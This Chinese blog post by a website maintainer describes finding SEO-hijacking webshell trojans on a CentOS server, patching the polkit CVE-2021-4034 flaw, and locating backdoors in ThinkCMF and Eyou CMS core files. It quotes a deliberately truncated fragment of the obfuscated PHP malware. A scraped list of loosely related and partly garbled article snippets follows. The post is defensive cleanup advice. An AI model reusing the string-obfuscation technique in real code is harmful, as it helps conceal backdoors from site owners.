网站中木马病毒黑帽非法信息处理
3.17突然收到邮件说我服务器有webshell,发现是有2个网站的缓存文件夹runtime里有后门,但是这个文件夹不能关闭写入权限一旦关闭网站都无法打开。于是只是清理了里面文件还是关闭了写入权限以为没事。
3.24发现很多个网站已经有百度非法快照信息了,我着急了。但是木马病毒就是找不到。于是我修复了一个centos漏洞 polkit pkexec 本地提权漏洞(CVE-2021-4034)
修复方法是:在服务器端命令行执行这2条命令升级polkit
#centos
rpm -qa polkit
yum -y update polkit

然后在一群里有个技术帮找到木马位置,原来这木马隐藏太深杀毒软件也识别不了,这个挂码只拦截搜索引擎流量 正常访问看不出来非常的隐蔽狡猾。代码是这样的(防止被人恶意用途删除了部分):

error_reporting(0);header('Content-Type:text/html;charset=utf-8');$qwe=str_replace("d","","sdtdrd_redpdldadcde");$qaz=$qwe("d","","fdidlded_dgdedtd_dcdodndtdedndtds");$aa=$qwe("w","","dwawtwew_wdwewfwawuwlwtw_

如果是Thinkcmf隐藏的位置在/simplewind/Core/ThinkPHP.php
如果是易优隐藏的位置在/core/base.php 还有 /core/helper.php
在文件里搜索找到他们删除。太恐怖了,若不是群里技术朋友帮忙真的一点办法没有,只能一个个拿之前正常的老源代码去还原。做维护真的很不容易没事还好一旦出问题就是整个网站出问题。
服务器一旦被入侵就是整个网站出事情,工作量非常大。如果找不到原因更麻烦。
所以一定要养成定期备份正常源文件到本地习惯以防止万一可以做替换。
同时也希望大家如果发现其他被感染木马病毒的处理经验分享出来相互学习。

网站中木马病毒黑帽非法信息处理相关推荐

  1. Seo劫持---网站SEO优化中常见的黑帽技术:蜘蛛劫持

    很多seo人员喜欢黑帽技术,毕竟那是快速提升排名的方法.但是小编在这里告诫大家:如果你不是专业的黑客,还是放弃这种想法吧,因为那不是一般人能玩的.那么今天小编就来分享一些常见解决办法.下面我们来谈谈网 ...

  2. 计算机感染木马或病毒,电脑中木马病毒的症状

    大家好,我是时间财富网智能客服时间君,上述问题将由我为大家进行解答. 电脑中木马病毒的症状是: 1.文件或文件夹无故消失 当发现电脑中的部分文件或文件夹无缘无故消失,就可以确定电脑已经中了病毒.部分电 ...

  3. opencv中礼帽和黑帽_一流的礼帽

    opencv中礼帽和黑帽 Problem statement: 问题陈述: There is a class of N students and the task is to find the top ...

  4. 计算机感染木马或病毒后,计算机中木马病毒的症状

    大家好,我是Time Fortune.com的明智客户服务.我将为您解答以上问题. 计算机中的木马病毒的症状是: 1.文件或文件夹无故消失 如果发山词霸和QQ管理器,这三种主流的国内安全保护软件都具有 ...

  5. 服务器中木马病毒问题解决

    生产环境一台服务器中了木马病毒,阿里云提示有挖矿程序在运行 top查看cpu占用率达到100%,并且是一个未知程序,停掉后占用率回归正常 之后发现存在一些程序被木马病毒替换,包括ps,ss,netst ...

  6. 服务器中木马病毒处理(CPU占用率很高)处理办法

    参考:https://blog.csdn.net/wkfyynh/article/details/105206990 记录一下这个过程,方便后来人使用.如果遇到权限问题,在所有执行命令前使用sudo ...

  7. linux系统中病毒怎么解决,Linux 服务器中木马病毒及清除过程

    一.背景 晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包. 我们的服务器为了最好性能,防火墙(iptables)什么的都 ...

  8. linux 服务器 病毒,Linux 服务器中木马病毒及清除过程

    一.背景 晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包. 我们的服务器为了最好性能,防火墙(iptables)什么的都 ...

  9. 裸奔真的会中木马病毒 挖矿病毒 wup.exe 程序文件占用电脑资源

    4日晚上,打开任务管理器的时候发现CPU使用一直在80%,是 wup.exe 占用的,同时还占用了2G内存,低优先级运行,用户名 SYSTEM,很不正常,于是开始排查. 发现这玩意是上午十点左右中的, ...

最新文章

  1. 不打擦边球、不搞黑线路能不能挣钱, 开始我是忐忑的
  2. eslint 无法格式化ts_VS Code Prettier + ESlint 格式化Vue代码及遇到问题
  3. Webpack 打包太慢?来试试 Bundleless
  4. Redis从基础命令到实战之散列类型(Hash)
  5. 使用 IntraWeb (12) - 基本控件之 TIWGradButton、TIWImageButton
  6. CodeVs 1017 乘积最大(DP)
  7. 变量“componentresourcemanager”未声明或从未赋值_频繁出现在面试题中,却容易被人遗忘:变量、基本数据类型...
  8. Android组件化开发实践
  9. 数字金额转化为中文大写
  10. Unity SRP自定义渲染管线学习1.1:初步搭建
  11. Via板载声卡底噪严重、播放卡顿及耳机与扬声器音源切换问题【解决方法】
  12. 必备技能07:英语中常见的前缀和后缀
  13. 安装igraph踩过的坑
  14. [附源码]JAVA+ssm基于Java的运动健身平台(程序+Lw)
  15. php header 生成pdf,PHP如何生成PDF文档
  16. 使用Java+SSM(Spring+SpringMVC+Mybatis)如何开发个性化音乐推荐系统 在线音乐推荐网站 基于用户、项目的协同过滤推荐算法实现MusicRecommendSystemWeb
  17. 基于达尔文进化论的遗传算法,还能帮你破解同事的密码?| 附代码
  18. Python程序运行结束后发出提示音
  19. 2020学期学习计划
  20. AES加密算法及逆向

热门文章

  1. mysql关联查询php,MYSQL关联查询(PHP)
  2. STM32CubeIDE的FreeRTOS参数配置说明
  3. 【海云捷迅云课堂】vGPU在OpenStack中的应用
  4. 易语言操作java窗口,【求助】java加密方法使用易语言如何实现
  5. 计算机课堂热身游戏,上电脑课时偷偷玩的3个游戏,这些都没玩过,别说自己玩过游戏!...
  6. DSP:数字信号处理(Digital Signal Processing)
  7. 详解Python的pyyaml模块
  8. 微信公众号 语音转文字api_配音秀小程序(免费版文字转语音软件)公众号
  9. 第一篇随笔, 正在做 ESP32 , STM32 , 树莓派 RaspberryPi 的创客工具
  10. java 球面距离_Java 地球上计算两点之间距离计算方法